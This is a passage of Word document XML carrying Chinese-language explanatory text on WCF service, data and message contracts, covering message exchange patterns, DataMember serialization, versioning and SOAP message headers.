          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ServiceContract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="32"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>OperationContract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>属性，就可以定义服务契约。默认的操作名称是从类和方法名得来的，不过也可以在定义这些属性的时候指定。服务契约支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>种消息交换模式：请求一响应模式、单向模式和双工模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
        <w:framePr w:wrap="around" w:vAnchor="page" w:hAnchor="page" w:x="5675" w:y="5501"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:after="0" w:line="130" w:lineRule="exact"/>
        <w:ind w:firstLine="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>请求一响应模式的操作契约会令客户端的调用阻塞，也就是客户端等待服务操作结束，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>请求一响应模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minor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Pr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.NET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>异步模式来避免阻塞等待。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>单向操作契约</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>名符其实，是单向的，这种服务不会向客户端返回结果。服务操作的返回值类型必须为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>void</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而且要在</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OperationContract</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属性上做</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IsOneWay</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true</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的标记。单向契约可以在任何传输方式上实现，包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MSMQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>双工操作契约</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minor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这种模式非常适于用来对客户端作通知功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.数据契约</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>数据契约定义了服务的应用层数据接口。凡是标有</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DataComract</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和</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DataMember</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属性的类，均会被包含在代表服务契约的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WSDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>模式定义</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XSD</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部分。其他数据类型也可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WSDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>对外发布，如基本类型及标有</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Serializable</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的类型，由于</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DataContract</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对于序列化的规则是针对互通性设计的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WCF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>将其作为首选的序列化机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>具有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>[DataMember]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>的类成员，会被包含在一个数据契约中。这是严格按照自愿原则进行的，因此只有标有此属性的成员才会被包含在契约中。这也令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>[DataContract]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>较[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Serializable] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>更适宜作为序列化机制，毕竟后者会造成服务的内部结构被披露给外部。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>契约也支持类的层次结构，其命名空间会伴随整个层次机构。为了支持多态及包含其他对象的容器，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WCF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>允许服务公布一系列己知类型,数据契约的设计也考虑了版本控制问题。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>只要遵循一定的规则，即使向契约中添加了新成员，现有的客户端仍能继续工作.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3.消息契约</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>契约是定义于操作之上的契约，用于访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SOAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>消息头及消息体。消息的数据类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>可以通过</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DataContract</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或</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Serializable</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定义（有类型消息</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也可以简单地定为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>无类型消息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>。有类型消息之上，可以定义</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MessageHeader</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与</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MessageBody</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属性。消息的数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>据结构在设计阶段可以是未知的，以取得最大的灵活度，无类型消息也能够访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SOAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>消息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
